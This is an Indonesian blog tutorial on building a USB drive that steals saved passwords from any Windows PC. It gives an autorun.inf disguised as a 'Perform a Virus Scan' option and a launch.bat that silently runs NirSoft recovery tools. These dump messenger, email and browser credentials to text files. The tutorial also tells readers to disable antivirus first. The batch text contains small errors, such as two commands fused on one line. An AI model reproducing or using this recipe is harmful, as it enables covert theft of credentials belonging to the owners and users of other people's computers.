Tutorial Sniffing Password Menggunakan USB Drive




     Kembali lagi bersama saya. Semua orang bisa mencuri password yang disimpan di komputer manapun dan itu juga dengan menggunakan USB drive anda. Tidak percaya? Lihat di bawah ini.

Seperti yang kita semua tahu , Windows menyimpan sebagian besar password yang digunakan setiap hari , termasuk password instant messenger seperti MSN , Yahoo , AOL , Windows messenger dll. Seiring berjalannya waktu, Windows juga menyimpan password dari Outlook Express, SMTP , POP , account FTP dan auto-complete password banyak browser seperti IE dan Firefox. Disini ada banyak alat untuk memulihkan password dari tempat mereka disimpan. Gunakan alat-alat dan USB flashdisk anda, guna dapat membuat rootkit anda sendiri untuk sniffing password dari komputer manapun. Anda perlu alat-alat berikut untuk membuat rootkit anda sendiri.

MessenPass | Download : Alat pemulih password dari sebagian besar program instant messenger yang populer : MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView | Download : Alat pemulih password dari program email berikut : Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView bisa juga untuk memulihkan password dari akun email berbasis web (HotMail, Yahoo!, Gmail), jika anda menggunakan program yang terkait dengan akun tersebut.

IE Passview | Download : IE Passview adalah utilitas kecil yang bisa memulihkan password yang disimpan oleh Internet Explorer. Alat ini mendukung pada Internet Explorer 7.0, serta versi Internet explorer, v4.0 - v6.0.

Protected Storage Passview | Download : Memulihkan semua password yang disimpan di dalam protected storage, termasuk password AutoComplete internet explorer, password dari situs yang dilindungi password, MSN Explorer password, dan banyak lagi.

PasswordFox | Download : PasswordFox adalah alat kecil yang berfungsi memulihkan password yang memungkinkan anda melihat nama user dan password yang disimpan oleh broeser mozilla firefox. Secara default, PasswordFox menampilkan menampilkan password yang disimpan dalam profile anda saat ini, tetapi anda dapat memilih untuk melihat password yang lain dari profile Firework. Untuk setiap entri password, informasi berikut akan ditampilkan : Record Index, Web Site, User Name, Password, User Name Field, Password Field, dan Signons filename.

Berikut langkah-langkah prosedur untuk membuat password hacking toolkit :

    Catatan : Anda harus menonaktifkan sementara antivirus anda sebelum mengikuti langkah-langkah ini.


1. Download semua alat di atas, extract file tersebut dan copy hanya executable(.exe) file ke dalam USB flashdisk anda.

    Yaitu : Salin file - mspass.exe , mailpv.exe , iepv.exe , pspv.exe dan passwordfox.exe ke Drive USB Anda.

2. Buka notepad baru dan ketik text berikut kedalamnya :

    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan

Ganti ekstensi .txt, dan beri nama aoturun.inf. Sekarang copy autorun.inf tadi kedalam USB flashdisk anda.

3. Buka notepad baru dan ketik teks berikut ke dalamnya :

    start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start passwordfox.exe /stext passwordfox.txt

Simpan notepad tersebut dan beri nama launch.bat . Copy launch.bat file ke dalam USB flashdisk anda.

Sekarang rootkit anda sudah siap dan anda siap untuk Sniffing password. Anda dapat menggunakan flashdisk ini pada pada setiap komputer untuk Sniffing password yang tersimpan. Cukup ikuti langkah-langkah ini :

1. Masukan flashdisk dan autorun window akan keluar pop-up (Hal ini karena kamu menciptakan flashdisk autorun).

2. Pada pop-up window, pilih opsi pertama (Lakukan Virus Scan).

3. Sekarang semua alat password recovery akan diam-diam dijalankan di latar belakang (Proses ini memakan waktu hampir beberapa detik). Password bisa disimpan dalam file TXT.

4. Keluarkan flashdisk dan Anda akan melihat password yang tersimpan dalam file TXT.

Hacking ini akan berjalan pada Windows 2000, Xp, dan Vista.

    Catatan : Prosedur ini hanya akan memulihkan password yang disimpan ( jika ada ) pada komputer.

Nah, itulah tutorial Sniffing password menggunakan USB Drive. Selamat mencoba, dan berdo'a dulu sebelum mencoba. Terima kasih sudah berkunjung.
Previous
Next Post »
Thanks for your comment